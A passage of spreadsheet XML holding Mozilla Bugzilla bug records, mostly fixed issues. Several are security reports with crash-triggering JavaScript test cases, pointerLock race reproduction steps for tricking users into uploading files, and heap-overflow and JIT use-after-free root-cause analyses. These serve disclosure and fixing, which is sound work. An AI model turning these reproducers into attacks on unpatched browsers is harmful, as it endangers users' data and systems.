      </c>
    </row>
    <row r="632">
      <c r="A632" t="n">
        <v>667507</v>
      </c>
      <c r="B632" t="inlineStr">
        <is>
          <t>2011-06-27 10:15:10 -0700</t>
        </is>
      </c>
      <c r="C632" t="inlineStr">
        <is>
          <t>TM/JM: "Assertion failure: shape-&gt;previous() == obj-&gt;lastProperty()," with gc</t>
        </is>
      </c>
      <c r="D632" t="inlineStr">
        <is>
          <t>2012-03-23 17:23:45 -0700</t>
        </is>
      </c>
      <c r="E632" t="n">
        <v>1</v>
      </c>
      <c r="F632" t="n">
        <v>1</v>
      </c>
      <c r="G632" t="n">
        <v>3</v>
      </c>
      <c r="H632" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I632" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J632" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K632" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L632" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M632" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N632" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O632" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P632" t="inlineStr">
        <is>
          <t>[sg:critical?][needs aurora landing for Fx7][qa-]</t>
        </is>
      </c>
      <c r="Q632" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R632" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S632" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T632" t="n">
        <v>1</v>
      </c>
      <c r="U632" t="n">
        <v>0</v>
      </c>
      <c r="V632" t="n">
        <v>15</v>
      </c>
      <c r="W632" t="inlineStr">
        <is>
          <t>Created attachment 542188
stack
for (i = 0; i &lt; 10; i++) {
    Object.defineProperty({}, "", {
        get: function() {}
    })
    gc()
}
asserts js debug shell on TM changeset bf147b22f72c with -m, -a and -j at Assertion failure: shape-&gt;previous() == obj-&gt;lastProperty(),
Locking s-s because this involves gc and just-to-be-safe.
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   71353:dc137da5a3b4
user:        Igor Bukanov
date:        Tue May 31 10:01:09 2011 +0200
summary:     Bug 657198 - improving unreachable GC things detection in traces. r=gal</t>
        </is>
      </c>
      <c r="X632" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="633">
      <c r="A633" t="n">
        <v>1694698</v>
      </c>
      <c r="B633" t="inlineStr">
        <is>
          <t>2021-02-24 08:43:07 -0800</t>
        </is>
      </c>
      <c r="C633" t="inlineStr">
        <is>
          <t>requestPointerLock Race Condition Allow Set pointerLock to Any window.open URL (with MouseEvent still pass to script origin)</t>
        </is>
      </c>
      <c r="D633" t="inlineStr">
        <is>
          <t>2024-05-30 10:28:06 -0700</t>
        </is>
      </c>
      <c r="E633" t="n">
        <v>1</v>
      </c>
      <c r="F633" t="n">
        <v>1</v>
      </c>
      <c r="G633" t="n">
        <v>3</v>
      </c>
      <c r="H633" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I633" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J633" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K633" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L633" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M633" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N633" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O633" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P633" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main88+]</t>
        </is>
      </c>
      <c r="Q633" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R633" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S633" t="inlineStr">
        <is>
          <t>88 Branch</t>
        </is>
      </c>
      <c r="T633" t="n">
        <v>0</v>
      </c>
      <c r="U633" t="n">
        <v>0</v>
      </c>
      <c r="V633" t="n">
        <v>21</v>
      </c>
      <c r="W633" t="inlineStr">
        <is>
          <t>Created attachment 9205131
pointerlock+inputfile.html
When using `setTimeout` to adjust strict timing to call `requestPointerLock()` and `window.open(URL)` surprisingly the pointerLock will applied to the new window URL. 
After pointer is set to locked state, the MouseEvent still  pass to website that trigger the pointerlock, thus allow the script origin to listen user [MouseEvent](https://www.w3.org/TR/pointerlock/#dfn-target) movement data (including `mousemove`, `mousedown`, `mouseup`, `click`, and `wheel`) while user on another tab.
Interestingly I found when change pointerLock element to e.g. `&lt;input type="file"&gt;` or `&lt;select&gt;&lt;options&gt;` and etc. (I'm still explore to find interesting HTML element), the mouse click event will redirected to the element, so it also possible to trick user that the dialog was initiated by the current tab page.
In the attached testcase I'm using `&lt;input type="file"&gt;` element to demonstrate to trick the user that upload file dialog was initiated by the current tab page.
## Version Tested:
- Firefox Nightly 88.0a1 (2021-02-24) (64-bit)
- Firefox Release 86.0 (64-bit)
## Steps to Reproduce:
1. Visit attached pointerlock+inputfile.html
2. Click "Visit VT to Upload File" button
3. VirusTotal page is opened on new tab with pointer set to lock state (If VirusTotal tab immediately closed click again until success) (works most of the time on Windows 10, but on Linux may need to click for 2-5 times)
4. Click "Choose file" button on VirusTotal page or click any on the page
5. File upload dialog is open (as initiated by VirusTotal page)
6. Select any file then the file is submitted to script origin page</t>
        </is>
      </c>
      <c r="X633" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="634">
      <c r="A634" t="n">
        <v>826293</v>
      </c>
      <c r="B634" t="inlineStr">
        <is>
          <t>2013-01-03 08:04:09 -0800</t>
        </is>
      </c>
      <c r="C634" t="inlineStr">
        <is>
          <t>Pick Contact Activity is broken if the Contact has more than one Phone Number</t>
        </is>
      </c>
      <c r="D634" t="inlineStr">
        <is>
          <t>2013-01-28 03:55:57 -0800</t>
        </is>
      </c>
      <c r="E634" t="n">
        <v>1</v>
      </c>
      <c r="F634" t="n">
        <v>1</v>
      </c>
      <c r="G634" t="n">
        <v>6</v>
      </c>
      <c r="H634" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I634" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J634" t="inlineStr">
        <is>
          <t>Gaia::Contacts</t>
        </is>
      </c>
      <c r="K634" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L634" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M634" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N634" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O634" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P634" t="inlineStr"/>
      <c r="Q634" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R634" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S634" t="inlineStr">
        <is>
          <t>B2G C4 (2jan on)</t>
        </is>
      </c>
      <c r="T634" t="n">
        <v>1</v>
      </c>
      <c r="U634" t="n">
        <v>0</v>
      </c>
      <c r="V634" t="n">
        <v>5</v>
      </c>
      <c r="W634" t="inlineStr">
        <is>
          <t>Created attachment 697469
app is broken
STR:
Let C be a Contact with more than one phone number
Go to the SMS app and launch the pick Contact Activity by clicking on the person icon
Choose C 
The screenshot shows what is happening</t>
        </is>
      </c>
      <c r="X634" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="635">
      <c r="A635" t="n">
        <v>895819</v>
      </c>
      <c r="B635" t="inlineStr">
        <is>
          <t>2013-07-19 03:18:21 -0700</t>
        </is>
      </c>
      <c r="C635" t="inlineStr">
        <is>
          <t>[fig] about:home should show the "Visited" tab when triggered from a tap on the URL bar</t>
        </is>
      </c>
      <c r="D635" t="inlineStr">
        <is>
          <t>2020-12-21 10:31:17 -0800</t>
        </is>
      </c>
      <c r="E635" t="n">
        <v>1</v>
      </c>
      <c r="F635" t="n">
        <v>1</v>
      </c>
      <c r="G635" t="n">
        <v>6</v>
      </c>
      <c r="H635" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I635" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J635" t="inlineStr">
        <is>
          <t>Awesomescreen</t>
        </is>
      </c>
      <c r="K635" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L635" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M635" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N635" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O635" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P635" t="inlineStr">
        <is>
          <t>[fixed-fig], abouthome-hackathon</t>
        </is>
      </c>
      <c r="Q635" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R635" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S635" t="inlineStr">
        <is>
          <t>Firefox 26</t>
        </is>
      </c>
      <c r="T635" t="n">
        <v>1</v>
      </c>
      <c r="U635" t="n">
        <v>0</v>
      </c>
      <c r="V635" t="n">
        <v>8</v>
      </c>
      <c r="W635" t="inlineStr">
        <is>
          <t>Right now, we always show the Bookmarks tab by default when showing about:home. This bug depends on the patch in bug 893529.</t>
        </is>
      </c>
      <c r="X635" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="636">
      <c r="A636" t="n">
        <v>1675905</v>
      </c>
      <c r="B636" t="inlineStr">
        <is>
          <t>2020-11-06 18:32:39 -0800</t>
        </is>
      </c>
      <c r="C636" t="inlineStr">
        <is>
          <t>Write side effects in MCallGetProperty opcode not accounted for</t>
        </is>
      </c>
      <c r="D636" t="inlineStr">
        <is>
          <t>2021-04-04 18:57:36 -0700</t>
        </is>
      </c>
      <c r="E636" t="n">
        <v>1</v>
      </c>
      <c r="F636" t="n">
        <v>1</v>
      </c>
      <c r="G636" t="n">
        <v>3</v>
      </c>
      <c r="H636" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I636" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J636" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K636" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L636" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M636" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N636" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O636" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P636" t="inlineStr">
        <is>
          <t>[tfc-2020][sec-survey]</t>
        </is>
      </c>
      <c r="Q636" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R636" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S636" t="inlineStr">
        <is>
          <t>84 Branch</t>
        </is>
      </c>
      <c r="T636" t="n">
        <v>1</v>
      </c>
      <c r="U636" t="n">
        <v>0</v>
      </c>
      <c r="V636" t="n">
        <v>30</v>
      </c>
      <c r="W636" t="inlineStr">
        <is>
          <t>The root cause is in the |MIR.h| file and the opcode |MCallGetProperty|:
```
AliasSet getAliasSet() const override {
    if (!idempotent_) {
      return AliasSet::Store(AliasSet::Any);
    }
    return AliasSet::Load(AliasSet::ObjectFields | AliasSet::FixedSlot |
                          AliasSet::DynamicSlot);
  }
```
if |idempotent_| is true, compiler will think this opcode does NOT have write side effect. But this is wrong.
In the function |createThisScripted|, it will emit a |MCallGetProperty| which |idempotent_| is true:
```
 else {
    MCallGetProperty* callGetProp =
        MCallGetProperty::New(alloc(), newTarget, names().prototype);
    callGetProp-&gt;setIdempotent();
    getProto = callGetProp;
  }
```
It use this opcode to get callee.prototype, and this operatioin may call function |func_reslove| and write the |prototype| to slots, so it may be grow the slots buffer and update callee's slots buffer address. This will lead to UaF problem in JIT code as JIT code may be use the old buffer address after the grow.
https://twitter.com/TianfuCup/status/1324900642393976832</t>
        </is>
      </c>
      <c r="X636" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="637">
      <c r="A637" t="n">
        <v>1852729</v>
      </c>
      <c r="B637" t="inlineStr">
        <is>
          <t>2023-09-12 02:23:17 -0700</t>
        </is>
      </c>
      <c r="C637" t="inlineStr">
        <is>
          <t>Assertion failure: !JS_IsDeadWrapper(obj), at gecko-dev/js/src/gc/FinalizationObservers.cpp:409</t>
        </is>
      </c>
      <c r="D637" t="inlineStr">
        <is>
          <t>2024-06-02 11:57:18 -0700</t>
        </is>
      </c>
      <c r="E637" t="n">
        <v>1</v>
      </c>
      <c r="F637" t="n">
        <v>1</v>
      </c>
      <c r="G637" t="n">
        <v>3</v>
      </c>
      <c r="H637" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I637" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J637" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K637" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L637" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M637" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N637" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O637" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P637" t="inlineStr">
        <is>
          <t>[adv-main119+][adv-ESR115.4+]</t>
        </is>
      </c>
      <c r="Q637" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R637" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S637" t="inlineStr">
        <is>
          <t>120 Branch</t>
        </is>
      </c>
      <c r="T637" t="n">
        <v>1</v>
      </c>
      <c r="U637" t="n">
        <v>0</v>
      </c>
      <c r="V637" t="n">
        <v>19</v>
      </c>
      <c r="W637" t="inlineStr">
        <is>
          <t>Steps to reproduce:
SpiderMonkey:
commit: 09f7e00da9eaef55c80620c17e8575ddd4532451
Build:
```
/bin/sh gecko-dev/js/src/configure --enable-debug --disable-optimize --disable-shared-js --disable-tests
```
Test case:
```
for (let i = 0, j = 16; i &lt; j; ) 
{    
    j--;
    Uint32Array.newCompartment = true;
    const foo = this.newGlobal(Uint32Array).WeakRef;
    for (let a = 0, b = 16; a &lt; b; b--) 
    {
        const bar = new foo(this.transplantableObject().object);
        bar.deref(bar);
    }
}
this.nukeAllCCWs();
```
Actual results:
Exec:
```
Assertion failure: !JS_IsDeadWrapper(obj), at gecko-dev/js/src/gc/FinalizationObservers.cpp:409
...
JS::NonIncrementalGC(JSContext*, JS::GCOptions, JS::GCReason)[gecko-dev-build/debug_09f7e0/dist/bin/js +0x30e26ff]
...
Segmentation fault (core dumped)
```</t>
        </is>
      </c>
      <c r="X637" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="638">
      <c r="A638" t="n">
        <v>1507702</v>
      </c>
      <c r="B638" t="inlineStr">
        <is>
          <t>2018-11-16 00:31:27 -0800</t>
        </is>
      </c>
      <c r="C638" t="inlineStr">
        <is>
          <t>"about:crashcontent" and "about:crashparent" can be triggered from web content</t>
        </is>
      </c>
      <c r="D638" t="inlineStr">
        <is>
          <t>2019-02-10 12:40:37 -0800</t>
        </is>
      </c>
      <c r="E638" t="n">
        <v>1</v>
      </c>
      <c r="F638" t="n">
        <v>1</v>
      </c>
      <c r="G638" t="n">
        <v>2</v>
      </c>
      <c r="H638" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I638" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J638" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K638" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L638" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M638" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N638" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O638" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P638" t="inlineStr"/>
      <c r="Q638" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R638" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S638" t="inlineStr">
        <is>
          <t>Firefox 65</t>
        </is>
      </c>
      <c r="T638" t="n">
        <v>1</v>
      </c>
      <c r="U638" t="n">
        <v>0</v>
      </c>
      <c r="V638" t="n">
        <v>39</v>
      </c>
      <c r="W638" t="inlineStr">
        <is>
          <t>The firefox special URL "about:crashcontent" will trigger a crash of the current tab for testing purposes.
It is possible to trigger that URL from within a webpage, e.g. via an &lt;img&gt; tag. This also extends to being able to crash a browser from within an iframe, which I believe is particularly problematic as iframes are often used to embed content that a site not necessarily trusts.
(For a practical example look at https://twitter.com/xsamaster/status/1063347833271713792 - a tweet that embeds a "video" that will crash the browser tab.)
I believe a special debugging feature URL like about:crashcontent should never be accessible from a webpage, it should only be possible to activate it if the user actually types in that URL.</t>
        </is>
      </c>
      <c r="X638" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="639">
      <c r="A639" t="n">
        <v>424892</v>
      </c>
      <c r="B639" t="inlineStr">
        <is>
          <t>2008-03-24 17:14:57 -0700</t>
        </is>
      </c>
      <c r="C639" t="inlineStr">
        <is>
          <t>Ability to submit article feedback without leaving page</t>
        </is>
      </c>
      <c r="D639" t="inlineStr">
        <is>
          <t>2009-11-26 11:16:15 -0800</t>
        </is>
      </c>
      <c r="E639" t="n">
        <v>1</v>
      </c>
      <c r="F639" t="n">
        <v>1</v>
      </c>
      <c r="G639" t="n">
        <v>5</v>
      </c>
      <c r="H639" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I639" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J639" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K639" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L639" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M639" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N639" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O639" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P639" t="inlineStr">
        <is>
          <t>tiki_feature, tiki_depend</t>
        </is>
      </c>
      <c r="Q639" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R639" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S639" t="inlineStr">
        <is>
          <t>1.0.2</t>
        </is>
      </c>
      <c r="T639" t="n">
        <v>1</v>
      </c>
      <c r="U639" t="n">
        <v>0</v>
      </c>
      <c r="V639" t="n">
        <v>19</v>
      </c>
      <c r="W639" t="inlineStr">
        <is>
          <t>When you submit article feedback, you just get put back to the same page. It would be good to include some sort message at the top of the page or an intermediary page so people know that what they submitted was received.</t>
        </is>
      </c>
      <c r="X639" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="640">
      <c r="A640" t="n">
        <v>697918</v>
      </c>
      <c r="B640" t="inlineStr">
        <is>
          <t>2011-10-27 19:22:49 -0700</t>
        </is>
      </c>
      <c r="C640" t="inlineStr">
        <is>
          <t>Investigate try-mac64-slave06 (releng put back to pool)</t>
        </is>
      </c>
      <c r="D640" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E640" t="n">
        <v>1</v>
      </c>
      <c r="F640" t="n">
        <v>1</v>
      </c>
      <c r="G640" t="n">
        <v>5</v>
      </c>
      <c r="H640" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I640" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J640" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K640" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L640" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M640" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N640" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O640" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P640" t="inlineStr"/>
      <c r="Q640" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R640" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S640" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T640" t="n">
        <v>1</v>
      </c>
      <c r="U640" t="n">
        <v>0</v>
      </c>
      <c r="V640" t="n">
        <v>3</v>
      </c>
      <c r="W640" t="inlineStr">
        <is>
          <t>try-mac64-slave06 didn't come back from the reboot in bug 695531, so it will need some hands-on attention to diagnose what's wrong.</t>
        </is>
      </c>
      <c r="X640" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="641">
      <c r="A641" t="n">
        <v>513496</v>
      </c>
      <c r="B641" t="inlineStr">
        <is>
          <t>2009-08-29 13:17:12 -0700</t>
        </is>
      </c>
      <c r="C641" t="inlineStr">
        <is>
          <t>KB article: Enabling and disabling cookies</t>
        </is>
      </c>
      <c r="D641" t="inlineStr">
        <is>
          <t>2009-09-01 22:10:58 -0700</t>
        </is>
      </c>
      <c r="E641" t="n">
        <v>1</v>
      </c>
      <c r="F641" t="n">
        <v>1</v>
      </c>
      <c r="G641" t="n">
        <v>5</v>
      </c>
      <c r="H641" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I641" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J641" t="inlineStr">
        <is>
          <t>Knowledge Base Articles</t>
        </is>
      </c>
      <c r="K641" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L641" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M641" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N641" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O641" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P641" t="inlineStr"/>
      <c r="Q641" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R641" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S641" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T641" t="n">
        <v>1</v>
      </c>
      <c r="U641" t="n">
        <v>0</v>
      </c>
      <c r="V641" t="n">
        <v>6</v>
      </c>
      <c r="W641" t="inlineStr">
        <is>
          <t>This is a top search term, and we are splitting up the Cookies article to accommodate users search for this.
Say that there are enabled by default, in addition to showing them how to make sure.
The primary reason for this search term is that these users are visiting websites that tell them that cookies are disabled, which make this a carbon copy of &lt;https://support.mozilla.com/en-US/kb/Websites+say+cookies+are+blocked&gt;. We may end up deleting that article and redirecting here. I'm not sure yet.</t>
        </is>
      </c>
      <c r="X641" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="642">
      <c r="A642" t="n">
        <v>1443891</v>
      </c>
      <c r="B642" t="inlineStr">
        <is>
          <t>2018-03-07 11:03:10 -0800</t>
        </is>
      </c>
      <c r="C642" t="inlineStr">
        <is>
          <t>Integer overflow in nsScriptableUnicodeConverter::ConvertFromByteArray can cause a heap buffer overflow</t>
        </is>
      </c>
      <c r="D642" t="inlineStr">
        <is>
          <t>2024-05-30 09:43:39 -0700</t>
        </is>
      </c>
      <c r="E642" t="n">
        <v>1</v>
      </c>
      <c r="F642" t="n">
        <v>1</v>
      </c>
      <c r="G642" t="n">
        <v>3</v>
      </c>
      <c r="H642" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I642" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J642" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K642" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L642" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M642" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N642" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O642" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P642" t="inlineStr">
        <is>
          <t>[adv-esr52.8+]</t>
        </is>
      </c>
      <c r="Q642" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R642" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S642" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T642" t="n">
        <v>1</v>
      </c>
      <c r="U642" t="n">
        <v>0</v>
      </c>
      <c r="V642" t="n">
        <v>17</v>
      </c>
      <c r="W642" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:58.0) Gecko/20100101 Firefox/58.0
Build ID: 20180206200532
Steps to reproduce:
I. The bug 
In nsScriptableUnicodeConverter::ConvertFromByteArray (ff-esr52/intl/uconv/nsScriptableUConv.cpp), the malloc() size argument on line 148 is computed from an unbounded integer value, which can overflow:  
134:nsScriptableUnicodeConverter::ConvertFromByteArray(const uint8_t* aData,
135:                                                   uint32_t aCount,
136:                                                   nsAString&amp; _retval)
137:{
138:  if (!mDecoder)
139:    return NS_ERROR_FAILURE;
140:
141:  nsresult rv = NS_OK;
142:  int32_t inLength = aCount;
143:  int32_t outLength;
144:  rv = mDecoder-&gt;GetMaxLength(reinterpret_cast&lt;const char*&gt;(aData),
145:                              inLength, &amp;outLength);
146:  if (NS_SUCCEEDED(rv))
147:  {
148:    char16_t* buf = (char16_t*)malloc((outLength+1) * sizeof(char16_t));
149:    if (!buf)
150:      return NS_ERROR_OUT_OF_MEMORY;
151:
152:    rv = mDecoder-&gt;Convert(reinterpret_cast&lt;const char*&gt;(aData),
153:                           &amp;inLength, buf, &amp;outLength);
154:    if (NS_SUCCEEDED(rv))
155:    {
156:      buf[outLength] = 0;
157:      if (!_retval.Assign(buf, outLength, mozilla::fallible)) {
158:        rv = NS_ERROR_OUT_OF_MEMORY;
159:      }
160:    }
161:    free(buf);
162:    return rv;
163:  }
164:  return NS_ERROR_FAILURE;
165:
166:}
The outLength value is provided by GetMaxLength() (line 144), which is a member of nsIUnicodeDecoder class, and represented by nsUTF8ToUnicode::GetMaxLength in this case (see bug#1440926 for some background analysis of this family of classes). It is computed as the length of aData passed from the caller, plus 1.
Consider for instance, that the length of aData is INT32_MAX-1. Then outLength will be INT32_MAX and will overflow on the addition operation (line 148), and become -2147483648. Then the multiplication operation by 2 (sizeof(char16_t)) will overflow it again, and the result will be truncated to zero and passed as an argument to malloc(). 
Here is an output of a simple test program written in C and compiled with Clang (Apple LLVM version 8.0.0 (clang-800.0.42.1)), which demostrates the effect of the unchecked integer arithmetic in this code:
$ ./a.out
INT32_MAX + 1 = -2147483648 (0x80000000)
(INT32_MAX + 1) * 2 = 0 (0x0)
Next, nsUTF8ToUnicode::Convert() on line 152 will populate the zero-sized buffer with unicode data derived from aData, using the original value of outLength (which is still INT32_MAX) as the bound. That will lead to overwrite of unowned memory which immediately follows the buffer, with caller-controlled data. 
II. Reachability analysis
The only place where nsScriptableUnicodeConverter::ConvertFromByteArray is used in core code is nsScriptableUnicodeConverter::ConvertToUnicode. Both functions are directly exposed to privileged Javascript in Firefox. Therefore, I have identified 3 possible attack vectors:
1. Via a malicious extension
Privileged Javascript can obtain an instance of nsScriptableUnicodeConverter via Components.classes class factory, as such:
var converter = Components.classes["@mozilla.org/intl/scriptableunicodeconverter"]
                .createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
And then call the ConvertToUnicode/ConvertFromByteArray functions directly with an arbitrary String or a TypedArray.
https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIScriptableUnicodeConverter
2. (1) implies that all Firefox installations which have installed an legitimate extension which uses nsIScriptableUnicodeConverter are affected. 
The specific attack vector in this case depends on how the extension uses the class, however it's likely to operate on user-controlled data. (See bug#289947 for example of such an extension and the user-controlled data which it processed)
3. There is a number of places in the components of Firefox written in Javascript, which instantiate and use nsScriptableUnicodeConverter for their own purposes.
Notably devtools, password manager, settings, and import of bookmarks:
nsScriptableUnicodeConverter::ConvertToUnicode:
./browser/base/content/test/urlbar/browser_urlbarCopying.js:12:  return converter.ConvertToUnicode(input);
